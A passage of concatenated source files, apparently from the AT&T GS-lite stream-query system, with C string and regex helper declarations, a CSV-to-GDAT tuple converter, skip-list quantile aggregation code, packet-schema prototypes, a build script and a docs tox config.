gs_uint32_t str_match_offset(gs_uint32_t offset,vstring *s1,vstring *s2);
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val,vstring *s2);
// REGEX functions
gs_retval_t str_regex_match(vstring* str, gs_param_handle_t pattern_handle);
gs_param_handle_t register_handle_for_str_regex_match_slot_1(vstring* pattern);
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle);
gs_retval_t str_partial_regex_match(vstring* str, gs_param_handle_t pattern_handle);
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(vstring* pattern);
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(gs_param_handle_t handle);
gs_param_handle_t register_handle_for_str_extract_regex_slot_1(vstring* pattern);
gs_retval_t str_extract_regex( vstring * result, vstring * str, gs_param_handle_t handle);
gs_retval_t deregister_handle_for_str_extract_regex_slot_1(gs_param_handle_t handle);
// type conversion
// Avoid redefinition from rts_udaf.h
#ifndef INT
#define INT(c) ((int)(c))
#define UINT(c) ((gs_uint32_t)(c))
#define FLOAT(c) ((gs_float_t)(c))
#define LLONG(c) ((long long int)(c))
#define ULLONG(c) ((gs_uint64_t)(c))
#endif
// string conversions
gs_uint32_t strtoi(gs_uint32_t * r, struct vstring *data);
gs_uint32_t strtoip(gs_uint32_t * r, struct vstring *data);
// constant string conversions
// Avoid redefinition from rts_udaf.h
#ifndef strtoi_c
#define strtoi_c(h) ((gs_uint32_t)(h))
#define strtoip_c(h) ((gs_uint32_t)(h))
#endif
gs_param_handle_t register_handle_for_strtoi_c_slot_0(vstring* istr) ;
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) ;
gs_param_handle_t register_handle_for_strtoip_c_slot_0(vstring* istr) ;
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) ;
inline gs_uint32_t str_match_offset( gs_uint32_t offset, struct vstring * s1, struct vstring * s2) {
register gs_uint8_t *st1 = (gs_uint8_t *) s1->offset;
register gs_uint8_t *st2 = (gs_uint8_t *) (s2->offset+offset);
register gs_int32_t x;
register gs_int32_t len2 = s2->length-offset;
register gs_int32_t len1 = s1->length;
if (len2<len1) return 0;
for(x=0; x<len1; x++) {
if (st1[x]!=st2[x]) return 0;
}
return 1;
}
// -------------------------------------------------------
// map_int_to_string and its support functions, structs
gs_param_handle_t register_handle_for_int_to_string_map_slot_1(vstring *filename);
gs_retval_t int_to_string_map(vstring *result, gs_int64_t val, gs_param_handle_t handle);
gs_param_handle_t deregister_handle_for_int_to_string_map_slot_1(gs_param_handle_t handle);
// --------------------------------------------------
// to_hex_string, for printing a binary string
gs_retval_t to_hex_string(vstring *result, vstring *val);
// ------------------------------------------------------
// sum up unsigned integers expressed as a string with separators,
// e.g. on input '34|45|56' and sep '|', return 135.
// This kind of thing is common in Nokia PCMD data.
// gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct vstring *list, struct vstring *sepchar);
// --------------------------------------------
// Convert an string to an integer
gs_int64_t to_llong(vstring *v);
#endif
<file_sep>import os
import time
while True:
while os.path.isfile("exampleCsv"):
time.sleep(1)
os.system("cp example.data exampleCsvX ; mv exampleCsvX exampleCsv")
time.sleep(1)
<file_sep>#!/bin/sh
# ------------------------------------------------
# Copyright 2014 AT&T Intellectual Property
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------
# GSLITE_ROOT environment variable need to be set
if [ -z "$GSLITE_ROOT" ]
then
echo "GSLITE_ROOT must be set to non-empty string"
exit -1
fi
$GSLITE_ROOT/bin/translate_fta -f -N -h localhost -c -M -R $GSLITE_ROOT -C $GSLITE_ROOT/cfg -l $GSLITE_ROOT/qlib packet_schema.txt *.gsql
ret=$?
if [ $ret -ne 0 ]
then
echo "Query translation failed!"
exit $ret
fi
make
ret=$?
if [ $ret -ne 0 ]
then
echo "Query build failed!"
exit $ret
fi
exit $ret
<file_sep>#==================================================================================
# Copyright (c) 2018-2019 AT&T Intellectual Property.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==================================================================================
[tox]
minversion = 2.0
envlist =
docs,
docs-linkcheck,
skipsdist = true
[testenv:docs]
basepython = python3
deps =
sphinx
sphinx-rtd-theme
sphinxcontrib-httpdomain
recommonmark
lfdocs-conf
commands =
sphinx-build -W -b html -n -d {envtmpdir}/doctrees ./docs/ {toxinidir}/docs/_build/html
echo "Generated docs available in {toxinidir}/docs/_build/html"
whitelist_externals = echo
[testenv:docs-linkcheck]
basepython = python3
deps = sphinx
sphinx-rtd-theme
sphinxcontrib-httpdomain
recommonmark
lfdocs-conf
commands = sphinx-build -W -b linkcheck -d {envtmpdir}/doctrees ./docs/ {toxinidir}/docs/_build/linkcheck
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <schemaparser.h>
#include "gsconfig.h"
#include "gstypes.h"
#include <math.h>
FILE * ifd;
FILE * ofd;
FILE * sfd;
#define MAX_GDAT_HEADER 10000
gs_int8_t buf[2*MAXTUPLESZ];
gs_int8_t schema_buf[MAX_GDAT_HEADER];
gs_int8_t header_buf[MAX_GDAT_HEADER];
gs_retval_t read_tuple(gs_uint32_t * sz, gs_sp_t data, gs_int32_t maxlen) {
gs_uint32_t nsz;
static gs_uint32_t read=0;
again:
if (fread(&nsz,sizeof(gs_uint32_t),1,ifd)!=1) {
exit(0);
}
read=read+sizeof(gs_uint32_t);
*sz=ntohl(nsz);
if ((*sz)>maxlen) {
fprintf(stderr,"INTERNAL ERROR tuple to long for fixed buffer. Tuple sz %u\n",
(*sz));
*sz=0;
return 0;
}
if (*sz==0) goto again;
if (fread(data,(*sz),1,ifd)!=1) {
fprintf(stderr,"UNEXPECTED END OF FILE. Tried to read tuple of size %u\n",
(*sz));
exit(0);
}
read=read+*sz;
return 0;
}
int main(int argc, char** argv) {
gs_schemahandle_t schema;
gs_uint32_t rsize;
gs_int8_t rbuf[2*MAXTUPLESZ];
gs_int8_t wbuf[2*MAXTUPLESZ];
gs_int32_t numberoffields;
gs_int32_t verbose=0;
gs_int32_t y;
gs_int32_t parserversion;
gs_uint32_t schemalen;
gs_sp_t me;
gs_int32_t ch;
me=argv[0];
if (argc<2) {
fprintf(stderr,
"%s::usage: %s -v -x <schema_file_name> <input_file_name> <output_file_name>\n",
me,me);
exit(1);
}
while ((ch = getopt(argc, argv, "vx")) != -1) {
switch(ch) {
case 'v':
verbose=1;
break;
case 'x':
verbose=2;
}
}
argc -= optind;
if (argc < 1) {
fprintf(stderr,"%s::usage: %s -v -x <schema_file_name> <input_file_name> <output_file_name>\n",
me,me);
exit(1);
}
argv += optind;
if ((sfd=fopen(argv[0],"r"))==0) {
fprintf(stderr,"%s::error:could not open schema file %s\n",
me,argv[0]);
exit(1);
}
schemalen = fread(schema_buf, 1, MAX_GDAT_HEADER, sfd);
schema_buf[schemalen] = 0;
schema = ftaschema_parse_string_prot(schema_buf);
if (schema < 0) {
fprintf(stderr,"%s::error:unable to parse schema file %s\n",
me,argv[0]);
exit(1);
}
fclose(sfd);
argv++;
if ((strcmp(argv[0],"-")!=0)&&(strcmp(argv[0],"stdin")!=0)) {
if ((ifd=fopen(argv[0],"r"))==0) {
fprintf(stderr,"%s::error:could not open input file %s\n",
me,argv[0]);
exit(1);
}
} else {
ifd = stdin;
}
argv++;
if ((ofd=fopen(argv[0],"wb"))==0) {
fprintf(stderr,"%s::error:could not open output file %s\n",
me,argv[0]);
exit(1);
}
parserversion = get_schemaparser_version();
// write GDAT header
sprintf(header_buf,"GDAT\nVERSION:%u\nSCHEMALENGTH:%lu\n",
parserversion,schemalen+1);
// need to get ASCII version of schema
fwrite(header_buf,strlen(header_buf),1,ofd);
fwrite(schema_buf,schemalen+1,1,ofd);
/////////////////////////////////////////////
if ((numberoffields=ftaschema_tuple_len(schema))<0) {
fprintf(stderr,"%s::error:could not get number of fields in schema\n",
me);
exit(1);
}
if (verbose==1) {
for(y=0; y<numberoffields;y++) {
printf("%s",ftaschema_field_name(schema,y));
if (y<numberoffields-1) printf("|");
}
printf("\n");
}
unsigned long long tup_cnt = 0;
while(!feof(ifd)) {
fgets(rbuf,2*MAXTUPLESZ,ifd);
gs_uint32_t tuple_pos = ftaschema_get_tuple_metadata_offset(schema) + 1; // position to copy string payload
char* field = strtok(rbuf, ",");
y = 0;
do {
gs_int32_t field_type = ftaschema_get_field_type_by_index(schema, y);
gs_int32_t field_offset = ftaschema_get_field_offset_by_index(schema, y);
gs_int32_t i;
gs_uint32_t ui;
gs_uint64_t ul;
gs_uint64_t l;
gs_float_t f,intpart,fractpart;
struct timeval t;
struct vstring32 vs;
struct hfta_ipv6_str ip6;
gs_uint32_t v[8];
unsigned ip1,ip2,ip3,ip4;
switch (field_type) {
case BOOL_TYPE:
ui=(strncasecmp("TRUE",field,4)==0);
memcpy(wbuf+field_offset,&ui,sizeof(ui));
break;
case INT_TYPE:
sscanf(field,"%d",&i);
memcpy(wbuf+field_offset,&i,sizeof(i));
break;
case UINT_TYPE:
case USHORT_TYPE:
sscanf(field,"%u",&ui);
memcpy(wbuf+field_offset,&ui,sizeof(ui));
break;
case ULLONG_TYPE:
sscanf(field,"%llu",&ul);
memcpy(wbuf+field_offset,&ul,sizeof(ul));
break;
case LLONG_TYPE:
sscanf(field,"%ldu",&l);
memcpy(wbuf+field_offset,&l,sizeof(l));
break;
case FLOAT_TYPE:
sscanf(field,"%f",&f);
memcpy(wbuf+field_offset,&f,sizeof(f));
break;
case VSTR_TYPE:
{
if (!strcmp(field, " "))
field[0] = 0;
vs.length = strlen(field);
vs.offset = tuple_pos;
vs.reserved = 0;
memcpy(wbuf+vs.offset, field, vs.length);
memcpy(wbuf+field_offset,&vs,sizeof(vs));
tuple_pos += vs.length;
}
break;
case IP_TYPE:
sscanf(field,"%u.%u.%u.%u",&ip1,&ip2,&ip3,&ip4);
ui=(ip1<<24)|(ip2<<16)|(ip3<<8)|ip4;
memcpy(wbuf+field_offset,&ui,sizeof(ui));
break;
case IPV6_TYPE:
sscanf(field,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
ip6.v[0]=htonl(v[0]<<16|v[1]);
ip6.v[1]=htonl(v[2]<<16|v[3]);
ip6.v[2]=htonl(v[4]<<16|v[5]);
ip6.v[3]=htonl(v[6]<<16|v[7]);
memcpy(wbuf+field_offset,&ip6,sizeof(ip6));
break;
case TIMEVAL_TYPE:
sscanf(field,"%lf sec",&f);
fractpart=modf(f,&intpart);
t.tv_sec = intpart;
t.tv_usec = fractpart * 1000000;
memcpy(wbuf+field_offset,&t,sizeof(t));
break;
default:
break;
}
y++;
field = strtok(NULL, ",");
} while (y < numberoffields);
gs_uint32_t tup_len = htonl(tuple_pos);
fwrite(&tup_len,sizeof(gs_uint32_t),1,ofd);
fwrite(wbuf,tuple_pos,1,ofd);
tup_cnt++;
if (tup_cnt % 1000000 == 0)
printf("dumped %llu tuples\n", tup_cnt);
}
fclose(ifd);
fclose(ofd);
if (verbose!=0) fflush(stdout);
exit(0);
}
<file_sep>#ifndef _UDAF_COMMON_DEFINED_
#define _UDAF_COMMON_DEFINED_
// This include file contains definitions for UDAFS
// Which must be synchronized between the LFTA and HFTA layers
// for quantiles (flip_udaf)
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 50
#define QUANT_EPS 0.01
#define SKIPDIR_SIZE 100
#define SKIPDIR_HEIGHT_MAX 7
#endif
<file_sep>#include <stdio.h>
#include <limits.h>
#include <math.h>
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
/* Full size
#define QUANT_LFTA1_SIZE 729
#define QUANT_LFTA2_SIZE 181
#define QUANT_LFTA3_SIZE 100
*/
/* half size
*/
#define QUANT_LFTA1_SIZE 378
#define QUANT_LFTA2_SIZE 93
#define QUANT_LFTA3_SIZE 50
/* quarter size
#define QUANT_LFTA1_SIZE 202
#define QUANT_LFTA2_SIZE 49
#define QUANT_LFTA3_SIZE 25
*/
#define QUANT_EPS 0.01
#define SKIPDIR_SIZE 100
#define SKIPDIR_HEIGHT_MAX 7
#define max(a,b) ((a) > (b) ? (a) : (b))
#define COMPRESSED_XFER
/****************************************************************/
/* Data Structures */
/****************************************************************/
typedef struct tuple_t {
gs_uint32_t val;
gs_uint32_t gap;
gs_uint32_t del;
gs_uint32_t next;
} tuple_t;
// For skip list
typedef gs_uint32_t val_type;
typedef struct skipnode {
val_type val;
gs_uint32_t next;
gs_uint32_t down;
} skipnode_t;
typedef struct skipdir {
gs_uint32_t height; // height of tree
gs_uint32_t freeptr; // cursor space stack
gs_uint32_t headptr[SKIPDIR_HEIGHT_MAX+1]; // ptrs to levels
skipnode_t list[SKIPDIR_SIZE+1];
} skipdir_t;
/****************************************************************/
// fstring(5+(QUANT_LFTA3_SIZE+1)*4 +
// (2+lg(QUANT_LFTA3_SIZE)+(QUANT_LFTA3_SIZE+1)*3)*4)
typedef struct quant_udaf_lfta3_struct_t {
gs_uint32_t nelts; // # stream elements
gs_uint32_t freeptr; // ptr to cursor stack
gs_uint32_t usedptr; // ptr to allocated memory
gs_uint32_t circptr; // circulating ptr used for compression
gs_uint32_t size;
tuple_t t[QUANT_LFTA3_SIZE+1]; // samples + auxiliary info
skipdir_t sd; // directory for searching tuples
} quant_udaf_lfta3_struct_t;
/****************************************************************/
/* Skip List Functions */
/****************************************************************/
// Skip list cursor stack operations
gs_uint32_t skipdir_alloc(skipdir_t *sd)
{
gs_uint32_t ptr = sd->freeptr;
if (sd->freeptr != 0)
sd->freeptr = sd->list[ptr].next;
return ptr;
}
void skipdir_free(skipdir_t *sd, gs_uint32_t ptr)
{
sd->list[ptr].val = 0;
sd->list[ptr].down = 0;
sd->list[ptr].next = sd->freeptr;
sd->freeptr = ptr;
}
void skipdir_create(skipdir_t *sd)
{
gs_int32_t i;
sd->height = 0;
sd->freeptr = 1;
for (i=0; i < SKIPDIR_HEIGHT_MAX; i++)
sd->headptr[i] = 0;
for (i=1; i < SKIPDIR_SIZE; i++)
sd->list[i].next = i+1;
sd->list[SKIPDIR_SIZE].next = 0;
}
void skipdir_destroy(skipdir_t *sd)
{
sd->height = 0;
}
void skipdir_search(skipdir_t *sd, val_type val, gs_uint32_t *ptrstack)
{
gs_uint32_t ptr;
gs_int32_t l;
if (sd->height == 0) {
ptrstack[0] = ptrstack[1] = 0;
return;
}
// search nonleaf nodes
ptr = sd->headptr[sd->height-1];
for (l=sd->height-1; l >= 0; l--) {
if (ptr == 0) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else if (val <= sd->list[ptr].val) {
ptrstack[l+1] = 0;
ptr = (l > 0) ? sd->headptr[l-1] : 0;
}
else {
while ((sd->list[ptr].next != 0) &&
(sd->list[sd->list[ptr].next].val < val))
ptr = sd->list[ptr].next;
ptrstack[l+1] = ptr;
ptr = sd->list[ptr].down;
}
}
ptrstack[0] = ptr;
}
void skipdir_insert(skipdir_t *sd, gs_uint32_t *ptrstack,
gs_uint32_t leafptr, val_type val)
{
gs_uint32_t newptr, oldptr;
gs_int32_t l;
// if path already existed then point to new duplicate
if ((ptrstack[1] == 0) && (sd->headptr[0] != 0)
&& (sd->list[sd->headptr[0]].val == val)) {
sd->list[sd->headptr[0]].down = leafptr;
return;
}
if ((ptrstack[1] != 0) && (sd->list[ptrstack[1]].next != 0)
&& (sd->list[sd->list[ptrstack[1]].next].val == val)) {
sd->list[sd->list[ptrstack[1]].next].down = leafptr;
return;
}
for (l=0; l < SKIPDIR_HEIGHT_MAX; l++) {
if (random() % 2) break;
newptr = skipdir_alloc(sd);
if (!newptr) break; // out of memory
sd->list[newptr].val = val;
//copy(&val, &list[newptr[l]].val);
// link new directory node to level below
if (l > 0)
sd->list[newptr].down = oldptr;
else
sd->list[newptr].down = leafptr;
// insert node into current level
if ((l >= sd->height) || (ptrstack[l+1] == 0)) {
sd->list[newptr].next = sd->headptr[l];
sd->headptr[l] = newptr;
}
else {
sd->list[newptr].next = sd->list[ptrstack[l+1]].next;
sd->list[ptrstack[l+1]].next = newptr;
}
oldptr = newptr;
}
if (l > sd->height) sd->height = l;
//fprintf(stderr,"new height = %u\n",sd->height);
}
void skipdir_delete(skipdir_t *sd, gs_uint32_t *ptrstack, val_type val)
{
gs_uint32_t delptr;
gs_int32_t l;
for (l=0; l < sd->height; l++) {
if (ptrstack[l+1] == 0) {
delptr = sd->headptr[l];
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->headptr[l] = sd->list[delptr].next;
skipdir_free(sd, delptr);
}
else
break;
}
else {
delptr = sd->list[ptrstack[l+1]].next;
if (delptr == 0) break;
if (sd->list[delptr].val == val) {
sd->list[ptrstack[l+1]].next = sd->list[delptr].next;
skipdir_free(sd, delptr);
}
else
break;
}
}
}
// For Debugging
void skipdir_print(skipdir_t *sd)
{
gs_uint32_t ptr;
gs_int32_t l;
for (l=sd->height-1; l >= 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[ptr].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
for (l=sd->height-1; l > 0; l--) {
for (ptr=sd->headptr[l]; ptr != 0; ptr=sd->list[ptr].next)
fprintf(stderr,"%u ", sd->list[sd->list[ptr].down].val);
fprintf(stderr,"\n");
}
fprintf(stderr,"-------\n");
}
/*************************** Version 3 **************************/
/* Version 3: LFTA-medium */
/* */
/* NIC performs O(log n) operations at each update. */
/****************************************************************/
/****************************************************************/
/* Helper functions */
/****************************************************************/
gs_uint32_t quant_udaf_lfta3_cursor_alloc(quant_udaf_lfta3_struct_t *s)
{
gs_uint32_t ptr = s->freeptr;
if (s->freeptr != 0) s->freeptr = s->t[ptr].next;
s->size++;
return ptr;
}
void quant_udaf_lfta3_cursor_free(quant_udaf_lfta3_struct_t *s, gs_uint32_t ptr)
{
s->t[ptr].next = s->freeptr;
s->freeptr = ptr;
s->size--;
}
void quant_lfta3_print(quant_udaf_lfta3_struct_t *s)
{
tuple_t *t=s->t;
gs_uint32_t ptr = s->usedptr;
if (ptr == 0) {
fprintf(stderr,"<empty>\n");
return;
}
//skipdir_print(&s->sd);
for (; ptr != 0; ptr=t[ptr].next) {
fprintf(stderr,"(%u, %u, %u) ",t[ptr].val,t[ptr].gap,t[ptr].del);
}
fprintf(stderr,"\n");
}
void quant_lfta3_compress(quant_udaf_lfta3_struct_t *s)
{
tuple_t *t = s->t;
gs_uint32_t delptr;
gs_uint32_t threshold;
gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("1) s->circptr = %d\n",s->circptr);
//if(t[s->circptr].next < 0 || t[s->circptr].next >= QUANT_LFTA3_SIZE)
// printf("t[s->circptr].next = %d\n",t[s->circptr].next);
if ((s->circptr == 0) || (t[s->circptr].next == 0)
|| (t[t[s->circptr].next].next == 0))
s->circptr = s->usedptr;
//if ((s->size % 10) != 0) return;
if (s->nelts > 2) {
//if(s->circptr < 0 || s->circptr >= QUANT_LFTA3_SIZE)
// printf("2) s->circptr = %d\n",s->circptr);
delptr = t[s->circptr].next;
//if(delptr < 0 || delptr >= QUANT_LFTA3_SIZE)
// printf("delptr = %d\n",delptr);
//if(t[delptr].next < 0 || t[delptr].next >= QUANT_LFTA3_SIZE)
// printf("t[delptr].next = %d\n",t[delptr].next);
if (t[delptr].gap+t[t[delptr].next].gap+t[t[delptr].next].del < threshold) {
// delete from directory
if (t[s->circptr].val != t[delptr].val) {
// leftmost duplicate (if multiplicity)
skipdir_search(&(s->sd), t[delptr].val, ptrstack);
if (t[delptr].val == t[t[delptr].next].val) {
//if(s->sd.headptr[0] < 0 || s->sd.headptr[0] >= QUANT_LFTA3_SIZE)
// printf("s->sd.headptr[0] = %d\n",s->sd.headptr[0]);
// duplicates case
if ((ptrstack[1] == 0)
&& (s->sd.headptr[0] != 0)
&& (s->sd.list[s->sd.headptr[0]].val == t[delptr].val))
s->sd.list[s->sd.headptr[0]].down = t[delptr].next;
else if ((ptrstack[1] != 0)
&& (s->sd.list[ptrstack[1]].next != 0)
&& (s->sd.list[s->sd.list[ptrstack[1]].next].val == t[delptr].val))
s->sd.list[s->sd.list[ptrstack[1]].next].down = t[delptr].next;
}
else {
// non-duplicates case
skipdir_delete(&(s->sd), ptrstack, t[delptr].val);
}
}
// delete from list
//fprintf(stderr,"DELETED %u\n", t[delptr].val);
t[s->circptr].next = t[delptr].next;
quant_udaf_lfta3_cursor_free(s, delptr);
}
else {
s->circptr = t[s->circptr].next;
}
}
}
/****************************************************************/
/* LFTA3 functions */
/****************************************************************/
void quant_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t b)
{
gs_uint32_t i;
quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
s->nelts = 0;
s->usedptr = 0; // NULL ptr
s->circptr = 0;
// initialize cursor stack
s->freeptr = 1;
s->size = 0;
for (i=1; i < QUANT_LFTA3_SIZE; i++)
s->t[i].next = i+1;
s->t[QUANT_LFTA3_SIZE].next = 0;
skipdir_create(&(s->sd));
}
void quant_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v)
{
quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
tuple_t *t = s->t;
gs_uint32_t ptr = s->usedptr;
gs_uint32_t newptr, delptr;
gs_uint32_t obj; // objective function
gs_uint32_t threshold;
gs_uint32_t ptrstack[SKIPDIR_HEIGHT_MAX+5];
gs_uint32_t debugptr;
//printf("AGGR_UPDATE start\n");
s->nelts++;
//fprintf(stderr,"nelts = %u\n",s->nelts);
// left boundary case
if ((ptr == 0) || (v < t[ptr].val)) {
if (t[ptr].val == v) {
t[ptr].gap++;
//printf("AGGR_UPDATE END 1\n");
return;
}
newptr = quant_udaf_lfta3_cursor_alloc(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of space.\n");
return;
}
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = 0;
t[newptr].next = s->usedptr;
s->usedptr = newptr;
//printf("AGGR_UPDATE END 2\n");
return;
}
// locate $i$ such that (v_i-1 < v <= v_i)
skipdir_search(&(s->sd), v, ptrstack);
//ptr = (ptrstack[0] == 0) ? s->usedptr : s->sd.list[ptrstack[0]].down;
ptr = (ptrstack[0] == 0) ? s->usedptr : ptrstack[0];
while ((t[ptr].next != 0) && (t[t[ptr].next].val < v))
ptr = t[ptr].next;
/*
// duplicate value
if ((t[ptr].next != 0) && (t[t[ptr].next].val == v)) {
t[t[ptr].next].gap++;
printf("AGGR_UPDATE END 3\n");
return;
}
*/
// right boundary case
if (t[ptr].next == 0) {
newptr = quant_udaf_lfta3_cursor_alloc(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of space.\n");
return;
}
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = 0;
t[newptr].next = 0;
t[ptr].next = newptr;
//printf("AGGR_UPDATE END 4\n");
return;
}
// non-boundary case
//printf("1) t[ptr].next =%d, ptr=%d\n",t[ptr].next,ptr);
obj = t[ptr].gap+t[t[ptr].next].gap+t[t[ptr].next].del;
threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (gs_float_t)s->nelts);
if (obj > threshold) {
newptr = quant_udaf_lfta3_cursor_alloc(s);
if (newptr == 0) {
gslog(LOG_ALERT, "Out of memory.\n");
return;
}
//printf("newptr=%d\n",newptr);
t[newptr].val = v;
t[newptr].gap = 1;
t[newptr].del = t[t[ptr].next].gap+t[t[ptr].next].del - 1;
t[newptr].next = t[ptr].next;
t[ptr].next = newptr;
skipdir_insert(&(s->sd), ptrstack, newptr, v);
}
else {
// insert into existing bucket
//printf("t[ptr].next =%d\n",t[ptr].next);
t[t[ptr].next].gap++;
}
quant_lfta3_compress(s);
//printf("AGGR_UPDATE END 5\n");
}
gs_int32_t quant_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t b)
{
quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
if (s->freeptr == 0)
return 1;
else
return 0;
}
void quant_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *r, gs_sp_t b)
{
#ifdef COMPRESSED_XFER
quant_udaf_lfta3_struct_t *s = (quant_udaf_lfta3_struct_t *)b;
tuple_t tmp[QUANT_LFTA3_SIZE+1];
gs_uint32_t ptr=s->usedptr;
gs_int32_t i=0,j;
for (; ptr != 0; ptr=s->t[ptr].next) {
tmp[i].val = s->t[ptr].val;
tmp[i].gap = s->t[ptr].gap;
tmp[i].del = s->t[ptr].del;
i++;
}
for (j=1; j <= i; j++) {
s->t[j].val = tmp[j-1].val;
s->t[j].gap = tmp[j-1].gap;
s->t[j].del = tmp[j-1].del;
s->t[j].next = j+1;
}
s->t[i].next = 0;
s->usedptr = 1;
r->length = (5 + 4*(i+1))*sizeof(gs_uint32_t);
#endif
#ifndef COMPRESSED_XFER
r->length = sizeof(quant_udaf_lfta3_struct_t);
#endif
r->data = b;
}
void quant_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t b)
{
return;
}
<file_sep>#ifndef __SCHEMA_PROTOTYPES__
#define __SCHEMA_PROTOTYPES__
#ifdef __cplusplus
extern "C" {
#endif
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#define PRECOMP
#include "gsconfig.h"
#include "gstypes.h"
#include "fta.h"
#include "rts_external.h"
#include "packet.h"
#include "md_stdlib.h"
#include "schemaparser.h"
// parser sanity checks
// #define PARSER_SANITY_CHECKS
// *** SAMPLING RELATED CONSTANTS
// ******************************
// Make sure the hash table sizes are powers of 2-1 since they are used to compute the module with an and.
// collions on the flow hash are handled properly so they are not that bad
#define MAX_FLOWRECORD_HASH 0x1fffff
// keep the collision rate low on denies
#define MAX_DENY_HASH 0x7fffff
// one out of SAMPLING_RATE+1 sampling
#define SAMPLING_RATE 19
// sampling probability
#define FLOWSAMPPROB (((gs_float_t)1)/((gs_float_t)SAMPLING_RATE+1))
// wait for SAMPLED_FLOW_TIMEOUT seconds idle time to time a flow out
#define SAMPLED_FLOW_TIMEOUT 30
// check if we haven't seen that flow in SAMPLED_FLOW_IDLE_TIME seconds to make sure we don't catch it in the midle
#define SAMPLED_FLOW_IDLE_TIME 30
// PACKET SAMPLING RATE one in SAMPLED_PACKETS will be sampled
#define SAMPLED_PACKETS 200
// SAMPLING probability
#define PACKETSAMPPROB (((gs_float_t)1)/((gs_float_t)SAMPLED_PACKETS))
// COMBINE probability
#define COMBINEDPROB (((gs_float_t)1)-(((gs_float_t)1)-FLOWSAMPPROB)*(((gs_float_t)1)-PACKETSAMPPROB))
/* General packet access functions */
static inline gs_retval_t get_system_time(struct packet * p, gs_uint32_t * t)
{
*t=(gs_uint32_t) p->systemTime;
return 0;
}
static inline gs_retval_t get_schemaId(struct packet * p, gs_uint32_t * t)
{
*t=(gs_uint32_t) p->schema;
return 0;
}
// fast unsigned integer parsing functions
static inline __attribute__((always_inline)) unsigned long gs_strtoul (const char *str, size_t len) {
unsigned long value = 0;
switch (len) { // handle up to 10 digits, assume we're 32-bit
case 10: value += (str[len-10] - '0') * 1000000000;
case 9: value += (str[len- 9] - '0') * 100000000;
case 8: value += (str[len- 8] - '0') * 10000000;
case 7: value += (str[len- 7] - '0') * 1000000;
case 6: value += (str[len- 6] - '0') * 100000;
case 5: value += (str[len- 5] - '0') * 10000;
case 4: value += (str[len- 4] - '0') * 1000;
case 3: value += (str[len- 3] - '0') * 100;
case 2: value += (str[len- 2] - '0') * 10;
case 1: value += (str[len- 1] - '0');
return value;
default:
return 0;
}
}
static inline __attribute__((always_inline)) unsigned long long gs_strtoull (const char *str, size_t len) {
unsigned long long value = 0;
switch (len) { // handle up to 10 digits, assume we're 32-bit
case 20: value += (str[len-20] - '0') * 10000000000000000000UL;
case 19: value += (str[len-19] - '0') * 1000000000000000000UL;
case 18: value += (str[len-18] - '0') * 100000000000000000UL;
